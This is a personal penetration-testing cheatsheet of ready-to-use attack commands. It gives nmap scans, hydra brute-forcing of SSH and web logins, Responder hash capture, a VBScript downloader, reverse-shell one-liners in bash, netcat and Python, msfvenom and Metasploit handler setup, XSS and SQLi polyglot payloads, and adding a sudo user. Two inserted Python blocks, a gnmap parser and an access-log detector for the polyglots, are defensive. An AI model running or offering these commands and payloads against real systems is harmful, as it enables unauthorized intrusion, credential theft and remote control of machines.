# Personal pentesting cheatsheet

## Discovery

### Enumeration

#### Active Scanning

Assumes there's an `ips.txt` file with the IPs to target.

Full TCP scan:

```sh
nmap -v1 -A -T4 -p- -sS -oA full_tcp -iL ips.txt
```

Full TCP + UDP scan (very slow):

```sh
nmap -v1 -A -T4 -p- -sS -sU -oA full_tcp_udp -iL ips.txt
```

Common TCP ports only:

```sh
nmap -v1 -sS -Pn -p 21,22,23,25,53,80,111,135,137,138,139,161,389,443,445,873,1099,1194,1433,1434,2049,2082,2083,2376,2780,3260,3306,3389,5060,5061,5432,5500,5984,6379,8000,8080,8081,8200,8888,8098,9000,9050,9090,9091,9143,10099,10199,10443,9160,9443,8443,10000,11211,20000,27000,27001,27018,27019,27017,28017,60893 --open -oA common_tcp -iL ips.txt
```

SMB enumeration, listing machines vulnerable to EternalBlue (MS17-010):

```sh
nmap -v1 -p 139,445 --open --script smb-vuln-ms17-010 -oA smb_eternal_blue -iL ips.txt
```

SMTP user enumeration:

```sh
nmap --script smtp-enum-users.nse -p 25,465,587 -iL ips.txt
```

RDP encryption enumeration and MS12-020 check:

```sh
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 -iL ips.txt
```
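As an added example (not part of the original cheatsheet), a small Python parser for the grepable `.gnmap` file that `-oA full_tcp` writes next to the `.nmap` and `.xml` outputs, so the scan results become a host-to-open-ports inventory that can be queried (for example, every host answering on 445/tcp) instead of being read by eye. The sample file contents are constructed, and `full_tcp.gnmap` as the input path is an assumption taken from the command above.

```python
"""Turn nmap grepable output (.gnmap, written by -oA) into a host -> open ports inventory.

Grepable "Ports:" entries have the form
    port/state/protocol/owner/service/rpc info/version/
separated by ", "; only entries whose state is "open" are kept.
"""
import re
import sys
from collections import defaultdict

# Constructed sample of a .gnmap file (not real scan output), in the format nmap
# writes for the full TCP scan above.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -v1 -A -T4 -p- -sS -oA full_tcp -iL ips.txt
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//microsoft-ds///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)
Host: 10.0.0.9 (web01.example.test)\tStatus: Up
Host: 10.0.0.9 (web01.example.test)\tPorts: 80/open/tcp//http//nginx 1.18.0/, 443/open/tcp//ssl|https//nginx 1.18.0/\tIgnored State: closed (65533)
# Nmap done at Mon Jan  1 00:10:00 2024 -- 2 IP addresses (2 hosts up) scanned in 600.00 seconds
"""

# One port entry: seven slash-separated fields plus the trailing slash.
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return {ip: {port: (proto, service, version)}} containing open ports only."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        # Only "Host: ... Ports: ..." lines carry port data; "Status:" lines are skipped.
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            if state == "open":
                hosts[ip][int(port)] = (proto, service, version)
    return dict(hosts)


def hosts_with_port(inventory, port, proto="tcp"):
    """IPs that have the given port open on the given protocol, sorted."""
    return sorted(ip for ip, ports in inventory.items()
                  if port in ports and ports[port][0] == proto)


def main(argv):
    # Assumed input path: the .gnmap file written by "-oA full_tcp" above;
    # with no argument the constructed sample is parsed instead.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_GNMAP
    inventory = parse_gnmap(text)
    for ip in sorted(inventory):
        for port, (proto, service, version) in sorted(inventory[ip].items()):
            print(f"{ip}\t{port}/{proto}\t{service}\t{version}")
    print("hosts with 445/tcp open:", ", ".join(hosts_with_port(inventory, 445)) or "none")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 gnmap_inventory.py full_tcp.gnmap`; filtered and closed ports are dropped on purpose, so the `--open` scans above and the full scan produce the same kind of inventory.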

#### Services enumeration

DNS name servers and mail exchangers for a domain:

```sh
host -t ns megacorpone.com
host -t mx megacorpone.com
```

List SMB shares:

```sh
smbclient -L //<ip> -U <user>%<password>
```

## Exploitation

### wget on Windows

Usage: `cscript wget.vbs http://<ip>/<file.exe> <file.exe>`

Create the script from a command prompt (each `echo` appends one line to `wget.vbs`):

```bat
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.close >> wget.vbs
```

### Map and list the contents of every shared SMB resource

```sh
cat <ips_file> | xargs -n1 -I {} enum4linux -S -w <domain> -u <user> -p <pass> {}
```

### NFS

```sh
apt install nfs-common
mount -t nfs -o nolock <ip>:/<path> /mnt/
```

### Capture LLMNR/NetBIOS hashes with Responder

```sh
git clone https://github.com/lgandx/Responder.git
python Responder.py -I eth0 -rPv
```

### SSH

Test a list of users against a password wordlist:

```sh
hydra -V -L <users_list> -P <passwords_list> <ip> ssh -o hydra-ssh-attack.txt
```

Try every 4-character combination of lowercase letters, uppercase letters and digits (`-x min:max:charset`):

```sh
hydra -V -l <username> -x 4:4:aA1 <ip> ssh -o hydra-ssh-attack.txt
```

### Listen for a reverse shell

```sh
nc -l -p 9999 -vvv
```

### Reverse shell with a public host relay

From the internal machine, open a reverse SSH tunnel that exposes its local port 22 on port 2200 of the public host:

```sh
ssh -f -N -T -R 2200:localhost:22 user@public_host
```

From the public host, connect to the internal machine's SSH through the forwarded port 2200:

```sh
ssh -p 2200 user@localhost
```
## Post Exploitation

### Reverse Shell

Listener:

```sh
nc -lv 4444
```

Bash:

```sh
bash -i >& /dev/tcp/<ip>/4444 0>&1
```

Netcat:

```sh
nc -e /bin/sh <ip> 4444
```

Python:

```sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Metasploit

#### msfvenom

Reference: https://netsec.ws/?p=331

```sh
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python
```

#### Reverse Handler

```
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
```

#### Run with Docker

```sh
docker run --rm -i -t -p 9990-9999:9990-9999 -v /home/root/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data --name msf metasploitframework/metasploit-framework
```

### Web

#### Login Forms

```sh
hydra -L <users.txt> -P <pass.txt> -t 20 -w 30 -o hydra-http-post-attack.txt <ip> http-post-form "<local_uri>:user=^USER^&pass=^PASS^:<error_msg>"
```

### Polyglots

#### XSS

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```

#### SQLi

```
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
```
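From the defensive side, an added example (not part of the original cheatsheet) that flags the markers of these two polyglots in web server access logs: each request path is URL-decoded (twice, to catch double encoding), the `\x3c`/`\x3e` escapes the XSS payload uses for `<` and `>` are mapped back, and the result is matched case-insensitively for the time-based SQLi functions (`SLEEP`, `BENCHMARK`) and the XSS tells (`javascript:` scheme, event-handler attributes, tag names), since the mixed-case payload is built to slip past case-sensitive filters. The log lines are constructed and the signature names are my own.

```python
"""Flag requests carrying the XSS / time-based SQLi polyglot markers in web access logs.

Each request path is URL-decoded (up to twice), the \\x3c / \\x3e escapes used by
the XSS polyglot are mapped back to < and >, and the result is matched
case-insensitively against a small set of signatures.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic). Payloads are
# URL-encoded the way a browser or tool would send them.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=jaVasCript%3A%2F*-%2F*%60%2F*%5C%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%27%20or%20SLEEP(1)%20or%20%27 HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1 HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/8.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /p?x=%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert()%2F%2F%3E HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

# Client IP, method, path and status code from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

# Signature names are my own; the patterns target the markers in the polyglots above.
SIGNATURES = {
    "sqli-time-based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "xss-event-handler": re.compile(r"\bon(?:click|load|error|mouseover|focus|blur|submit)\s*=", re.I),
    "xss-js-scheme": re.compile(r"javascript\s*:", re.I),
    "xss-tag": re.compile(r"<\s*(?:svg|script|img|iframe)\b", re.I),
}


def normalise(value, rounds=2):
    """URL-decode up to `rounds` times, then undo the \\x3c / \\x3e hex escapes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"\\x3c", "<", value, flags=re.I)
    value = re.sub(r"\\x3e", ">", value, flags=re.I)
    return value


def scan_line(line):
    """Parse one log line; return the request fields plus the matched signature names, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    url = normalise(path)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(url))
    return {"ip": ip, "method": method, "path": path, "status": int(status), "hits": hits}


def scan_log(lines):
    """Only the requests that triggered at least one signature."""
    return [r for r in map(scan_line, lines) if r and r["hits"]]


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(f"{r['ip']} {r['method']} {r['path'][:60]} -> {', '.join(r['hits'])}")
```

Only the request line is inspected here; POST bodies never reach an access log, so the same signatures would need to run in the application or a WAF to cover form submissions like the login-form attack above. The event-handler list is deliberately explicit rather than `on\w+=`, which would also fire on ordinary parameters such as `online=1`.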

## Misc

rsync a full directory:

```sh
rsync -azvP <source>/ <dest>
```

Simple HTTP server:

```sh
python -m SimpleHTTPServer 80
# Python 3 equivalent
python3 -m http.server 80
```

### Filesystem

Directory size:

```sh
du -sh directory_name
```

Compress:

```sh
tar -zcvf <archive>.tgz <files>
```

### Users

Add a new user with sudo:

```sh
useradd -G sudo -d /home/<user> -m <user>
passwd <user>
```

Add sudo to an existing user:

```sh
usermod -a -G sudo <user>
```

## Links

- Penetration Testing Cheat Sheets